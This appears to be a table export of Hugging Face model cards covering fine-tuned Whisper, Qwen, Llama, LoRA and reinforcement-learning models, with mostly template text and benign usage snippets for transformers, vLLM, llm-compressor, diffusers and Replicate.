<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
luyotw/openfun-ivod-whisper-large-v3-negotiation-10-32 | luyotw | 2025-06-09T10:47:25Z | 0 | 0 | null | [
"tensorboard",
"safetensors",
"whisper",
"region:us"
] | null | 2025-06-09T08:21:59Z |
# Fine-tune 資訊
- 原始模型: `openai/whisper-large-v3`
- 使用音訊數量: 27385
- 使用音訊總長: 15.06 小時
- 音訊平均長度: 1.98 秒
- GPU: `NVIDIA H100 PCIe` x 1
- 訓練時間: 05:19:44
- 模型大小: 5.75 GB
- 訓練參數:
- batch size: 8
- eval batch size: 4
- gradient checkpointing: True
- fp16: False
- bf16: True
---
# Model Card
|
AlexHung29629/FormoMouse123 | AlexHung29629 | 2025-06-09T10:47:04Z | 202 | 0 | transformers | [
"transformers",
"safetensors",
"llama4_text",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-04T13:28:26Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
b6Amine/Quantized_nf4 | b6Amine | 2025-06-09T10:40:14Z | 0 | 0 | null | [
"safetensors",
"qwen3",
"license:apache-2.0",
"4-bit",
"bitsandbytes",
"region:us"
] | null | 2025-06-09T10:31:04Z | ---
license: apache-2.0
---
|
liyj8682/laoli-mfd | liyj8682 | 2025-06-09T10:31:51Z | 0 | 0 | null | [
"gguf",
"qwen2",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T08:42:01Z | ---
license: apache-2.0
---
|
Anagha1/Taxi-assignment | Anagha1 | 2025-06-09T10:31:49Z | 0 | 0 | null | [
"Taxi-v3",
"q-learning",
"reinforcement-learning",
"custom-implementation",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T10:00:47Z | ---
tags:
- Taxi-v3
- q-learning
- reinforcement-learning
- custom-implementation
model-index:
- name: Taxi-assignment
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: Taxi-v3
type: Taxi-v3
metrics:
- type: mean_reward
value: 7.56 +/- 2.71
name: mean_reward
verified: false
---
# **Q-Learning** Agent playing1 **Taxi-v3**
This is a trained model of a **Q-Learning** agent playing **Taxi-v3** .
## Usage
model = load_from_hub(repo_id="Anagha1/Taxi-assignment", filename="q-learning.pkl")
# Don't forget to check if you need to add additional attributes (is_slippery=False etc)
env = gym.make(model["env_id"])
|
Cusul/SFT_Stem_2 | Cusul | 2025-06-09T10:30:51Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T10:29:24Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
moxeeeem/aaa_proj | moxeeeem | 2025-06-09T10:28:33Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen2_5_vl",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T01:01:44Z | ---
base_model: unsloth/qwen2.5-vl-7b-instruct-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen2_5_vl
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** moxeeeem
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen2.5-vl-7b-instruct-bnb-4bit
This qwen2_5_vl model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
anasse15/MNLP_M3_rag_model_single_token | anasse15 | 2025-06-09T10:27:26Z | 19 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"unsloth",
"trl",
"sft",
"base_model:unsloth/Qwen3-0.6B-Base",
"base_model:finetune:unsloth/Qwen3-0.6B-Base",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-08T17:35:00Z | ---
base_model: unsloth/Qwen3-0.6B-Base
library_name: transformers
model_name: MNLP_M3_rag_model_single_token
tags:
- generated_from_trainer
- unsloth
- trl
- sft
licence: license
---
# Model Card for MNLP_M3_rag_model_single_token
This model is a fine-tuned version of [unsloth/Qwen3-0.6B-Base](https://huggingface.co/unsloth/Qwen3-0.6B-Base).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="anasse15/MNLP_M3_rag_model_single_token", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/anasse-elboudiri-epfl/huggingface/runs/2nw0q69q)
This model was trained with SFT.
### Framework versions
- TRL: 0.18.1
- Transformers: 4.52.3
- Pytorch: 2.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
duydq12/Qwen2.5-Coder-3B-Instruct-FP8-dynamic | duydq12 | 2025-06-09T10:27:22Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"llmcompressor",
"quantized",
"FP8",
"conversational",
"base_model:Qwen/Qwen2.5-Coder-3B-Instruct",
"base_model:quantized:Qwen/Qwen2.5-Coder-3B-Instruct",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"... | text-generation | 2025-06-09T10:22:50Z | ---
library_name: transformers
license: apache-2.0
pipeline_tag: text-generation
base_model:
- Qwen/Qwen2.5-Coder-3B-Instruct
tags:
- llmcompressor
- quantized
- FP8
---
# Qwen2.5-Coder-3B-Instruct-FP8-dynamic
## Model Overview
- **Model Architecture:** Qwen2ForCausalLM
- **Input:** Text
- **Output:** Text
- **Model Optimizations:**
- **Activation quantization:** FP8
- **Weight quantization:** FP8
- **Release Date:** 09/06/2025
- **Version:** 1.0
- **Model Developers:** duydq12 (enhance by RedHatAI)
### Model Optimizations
This model was obtained by quantizing activations and weights of [Qwen2.5-Coder-3B-Instruct](https://huggingface.co/Qwen/Qwen2.5-Coder-3B-Instruct) to FP8 data type.
This optimization reduces the number of bits used to represent weights and activations from 16 to 8, reducing GPU memory requirements (by approximately 50%) and increasing matrix-multiply compute throughput (by approximately 2x).
Weight quantization also reduces disk size requirements by approximately 50%.
Only weights and activations of the linear operators within transformers blocks are quantized.
Weights are quantized with a symmetric static per-channel scheme, whereas activations are quantized with a symmetric dynamic per-token scheme.
The [llm-compressor](https://github.com/vllm-project/llm-compressor) library is used for quantization.
## Deployment
This model can be deployed efficiently using the [vLLM](https://docs.vllm.ai/en/latest/) backend, as shown in the example below.
```python
from vllm import LLM, SamplingParams
from transformers import AutoTokenizer
model_id = "duydq12/Qwen2.5-Coder-3B-Instruct-FP8-dynamic"
number_gpus = 1
sampling_params = SamplingParams(temperature=0.6, top_p=0.95, top_k=20, min_p=0, max_tokens=256)
messages = [
{"role": "user", "content": prompt}
]
tokenizer = AutoTokenizer.from_pretrained(model_id)
messages = [{"role": "user", "content": "Give me a short introduction to large language model."}]
prompts = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=False)
llm = LLM(model=model_id, tensor_parallel_size=number_gpus)
outputs = llm.generate(prompts, sampling_params)
generated_text = outputs[0].outputs[0].text
print(generated_text)
```
vLLM aslo supports OpenAI-compatible serving. See the [documentation](https://docs.vllm.ai/en/latest/) for more details.
## Creation
<details>
<summary>Creation details</summary>
This model was created with [llm-compressor](https://github.com/vllm-project/llm-compressor) by running the code snippet below.
```python
from llmcompressor.modifiers.quantization import QuantizationModifier
from llmcompressor.transformers import oneshot
from transformers import AutoModelForCausalLM, AutoTokenizer
# Load model
model_stub = "Qwen/Qwen2.5-Coder-3B-Instruct"
model_name = model_stub.split("/")[-1]
model = AutoModelForCausalLM.from_pretrained(model_stub, torch_dtype="auto", device_map="auto")
tokenizer = AutoTokenizer.from_pretrained(model_stub, torch_dtype="auto", device_map="auto")
# Configure the quantization algorithm and scheme
recipe = QuantizationModifier(
ignore=["lm_head"],
targets="Linear",
scheme="FP8_dynamic",
)
# Apply quantization
oneshot(
model=model,
recipe=recipe,
)
# Save to disk in compressed-tensors format
save_path = model_name + "-FP8-dynamic"
model.save_pretrained(save_path)
tokenizer.save_pretrained(save_path)
print(f"Model and tokenizer saved to: {save_path}")
```
</details>
## Evaluation
private
### Accuracy
private
|
IntMeGroup/CompBench_Perception_difficult | IntMeGroup | 2025-06-09T10:23:34Z | 0 | 0 | null | [
"tensorboard",
"safetensors",
"internvl_chat",
"custom_code",
"license:apache-2.0",
"region:us"
] | null | 2025-06-09T06:54:23Z | ---
license: apache-2.0
---
|
Tsegayesemere/emotion-xlm-r-tigrigna_1 | Tsegayesemere | 2025-06-09T10:22:09Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T10:22:01Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
dhadheechi/a2c-PandaPickAndPlace-v3 | dhadheechi | 2025-06-09T10:21:42Z | 0 | 0 | stable-baselines3 | [
"stable-baselines3",
"PandaPickAndPlace-v3",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T10:17:32Z | ---
library_name: stable-baselines3
tags:
- PandaPickAndPlace-v3
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: A2C
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: PandaPickAndPlace-v3
type: PandaPickAndPlace-v3
metrics:
- type: mean_reward
value: -50.00 +/- 0.00
name: mean_reward
verified: false
---
# **A2C** Agent playing **PandaPickAndPlace-v3**
This is a trained model of a **A2C** agent playing **PandaPickAndPlace-v3**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3).
## Usage (with Stable-baselines3)
TODO: Add your code
```python
from stable_baselines3 import ...
from huggingface_sb3 import load_from_hub
...
```
|
thejaminator/medium_high-4e-05-4000-llama | thejaminator | 2025-06-09T10:15:35Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"base_model:unsloth/DeepSeek-R1-Distill-Llama-8B",
"base_model:finetune:unsloth/DeepSeek-R1-Distill-Llama-8B",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T10:15:26Z | ---
base_model: unsloth/DeepSeek-R1-Distill-Llama-8B
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** thejaminator
- **License:** apache-2.0
- **Finetuned from model :** unsloth/DeepSeek-R1-Distill-Llama-8B
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
BootesVoid/cmbmj8zyy012eekg04fc7my0f_cmbov7vku04goekg00cvgfvya | BootesVoid | 2025-06-09T09:57:40Z | 0 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2025-06-09T09:57:39Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: NUKY
---
# Cmbmj8Zyy012Eekg04Fc7My0F_Cmbov7Vku04Goekg00Cvgfvya
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `NUKY` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "NUKY",
"lora_weights": "https://huggingface.co/BootesVoid/cmbmj8zyy012eekg04fc7my0f_cmbov7vku04goekg00cvgfvya/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('BootesVoid/cmbmj8zyy012eekg04fc7my0f_cmbov7vku04goekg00cvgfvya', weight_name='lora.safetensors')
image = pipeline('NUKY').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## Training details
- Steps: 2000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/BootesVoid/cmbmj8zyy012eekg04fc7my0f_cmbov7vku04goekg00cvgfvya/discussions) to add images that show off what you’ve made with this LoRA.
|
yankaiwang/RLOO_20250609-024843 | yankaiwang | 2025-06-09T09:49:30Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T09:48:43Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
kalle07/stella-base-en-v2-Q8_0-GGUF | kalle07 | 2025-06-09T09:48:17Z | 0 | 0 | sentence-transformers | [
"sentence-transformers",
"gguf",
"feature-extraction",
"sentence-similarity",
"mteb",
"llama-cpp",
"gguf-my-repo",
"en",
"base_model:infgrad/stella-base-en-v2",
"base_model:quantized:infgrad/stella-base-en-v2",
"license:mit",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
... | feature-extraction | 2025-06-09T09:48:14Z | ---
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- mteb
- llama-cpp
- gguf-my-repo
language:
- en
license: mit
base_model: infgrad/stella-base-en-v2
model-index:
- name: stella-base-en-v2
results:
- task:
type: Classification
dataset:
name: MTEB AmazonCounterfactualClassification (en)
type: mteb/amazon_counterfactual
config: en
split: test
